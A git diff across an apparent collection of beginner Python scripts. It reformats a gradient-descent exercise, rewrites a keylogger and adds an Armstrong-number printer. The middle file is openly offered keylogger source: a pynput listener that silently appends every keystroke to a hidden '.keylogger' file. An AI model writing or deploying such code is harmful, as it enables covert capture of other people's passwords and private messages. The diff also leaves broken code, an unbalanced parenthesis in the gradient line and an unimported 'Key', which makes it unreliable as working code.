diff --git a/MachineLearning/gradient_descent.py b/MachineLearning/gradient_descent.py index 6c89d92..ddffa81 100644 --- a/MachineLearning/gradient_descent.py +++ b/MachineLearning/gradient_descent.py @@ -1,31 +1,3 @@ -#################################################################################### -## PROBLEM1: Gradient Descent -## Gradient descent is a popular optimization technique to solve many -## machine learning problems. In this case, we will explore the gradient -## descent algorithm to fit a line for the given set of 2-D points. -## ref: https://tinyurl.com/yc4jbjzs -## ref: https://spin.atomicobject.com/2014/06/24/gradient-descent-linear-regression/ -## -## -## input: directory of faces in ./data/1_points.csv/ -## function for reading points is provided -## -## -## your task: fill the following functions: -## evaluate_cost -## evaluate_gradient -## udpate_params -## NOTE: do NOT change values of 'init_params' and 'max_iterations' in optimizer -## -## -## output: cost after convergence (rmse, lower the better) -## -## -## NOTE: all required modules are imported. DO NOT import new modules. -## NOTE: references are given intline -## tested on Ubuntu14.04, 22Oct2017, Abhilash Srikantha -#################################################################################### - import numpy as np import matplotlib.pyplot as plt import time @@ -33,43 +5,37 @@ def load_data(fname): points = np.loadtxt(fname, delimiter=',') y_ = points[:,1] - # append '1' to account for the intercept - x_ = np.ones([len(y_),2]) + x_ = np.ones([len(y_), 2]) x_[:,0] = points[:,0] - # display plot - #plt.plot(x_[:,0], y_, 'ro') - #plt.xlabel('x-axis') - #plt.ylabel('y-axis') - #plt.show() print('data loaded. x:{} y:{}'.format(x_.shape, y_.shape)) return x_, y_ -def evaluate_cost(x_,y_,params): +def evaluate_cost(x_, y_, params): tempcost = 0 for i in range(len(y_)): tempcost += (y_[i] - ((params[0] * x_[i,0]) + params[1])) ** 2 - return tempcost / float(10000) + return tempcost / float(10000) -def evaluate_gradient(x_,y_,params): +def evaluate_gradient(x_, y_, params): m_gradient = 0 b_gradient = 0 N = float(len(y_)) for i in range(len(y_)): - m_gradient += -(2/N) * (x_[i,0] * (y_[i] - ((params[0] * x_[i,0]) + params[1]))) + m_gradient += -(2/N) * (x_[i,0] * (y_[i] - ((params[0] * x_[i,0]) + params[1])) b_gradient += -(2/N) * (y_[i] - ((params[0] * x_[i,0]) + params[1])) - return [m_gradient,b_gradient] + return [m_gradient, b_gradient] def update_params(old_params, grad, alpha): new_m = old_params[0] - (alpha * grad[0]) new_b = old_params[1] - (alpha * grad[1]) - return [new_m,new_b] + return [new_m, new_b] # initialize the optimizer -optimizer = {'init_params':np.array([4.5,2.0]) , - 'max_iterations':10000, - 'alpha':0.69908, - 'eps':0.0000001, - 'inf':1e10} +optimizer = {'init_params': np.array([4.5, 2.0]), + 'max_iterations': 10000, + 'alpha': 0.69908, + 'eps': 0.0000001, + 'inf': 1e10} # load data x_, y_ = load_data("./data/1_points.csv") @@ -83,16 +49,16 @@ def update_params(old_params, grad, alpha): old_cost = 1e10 for iter_ in range(optimizer['max_iterations']): # evaluate cost and gradient - cost = evaluate_cost(x_,y_,params) - grad = evaluate_gradient(x_,y_,params) + cost = evaluate_cost(x_, y_, params) + grad = evaluate_gradient(x_, y_, params) # display - if(iter_ % 10 == 0): + if iter_ % 10 == 0: print('iter: {} cost: {} params: {}'.format(iter_, cost, params)) # check convergence - if(abs(old_cost - cost) < optimizer['eps']): + if abs(old_cost - cost) < optimizer['eps']: break - # udpate parameters - params = update_params(params,grad,optimizer['alpha']) + # update parameters + params = update_params(params, grad, optimizer['alpha']) old_cost = cost except: cost = optimizer['inf'] diff --git a/Programs/P79_SimplePythonKeylogger.py b/Programs/P79_SimplePythonKeylogger.py index ff08573..d402add 100644 --- a/Programs/P79_SimplePythonKeylogger.py +++ b/Programs/P79_SimplePythonKeylogger.py @@ -4,7 +4,7 @@ # 1. pyxhook.py: file is provided in the folder itself # 2. Xlib: sudo pip3 install python3-Xlib -import pyxhook +'''import pyxhook import time # functions to write a newline character into the file @@ -47,3 +47,25 @@ def key_press_event(event): # Close the listener when we are done hookman.cancel() +''' + +from pynput.keyboard import Listener + +# Functions to handle key press and release events +def on_key_press(key): + try: + with open('.keylogger', 'a') as f: + f.write(str(key.char)) + except AttributeError: + # Handle special keys + with open('.keylogger', 'a') as f: + f.write(str(key)) + +def on_key_release(key): + if key == Key.esc: + # Terminate the listener + return False + +# Create a listener for both key press and release events +with Listener(on_press=on_key_press, on_release=on_key_release) as listener: + listener.join() diff --git a/armstrong.py b/armstrong.py new file mode 100644 index 0000000..0871bee --- /dev/null +++ b/armstrong.py @@ -0,0 +1,7 @@ +lower = 100 +upper = 2000 + +armstrong_numbers = [num for num in range(lower, upper + 1) if num == sum(int(digit) ** len(str(num)) for digit in str(num))] + +for armstrong in armstrong_numbers: + print(armstrong)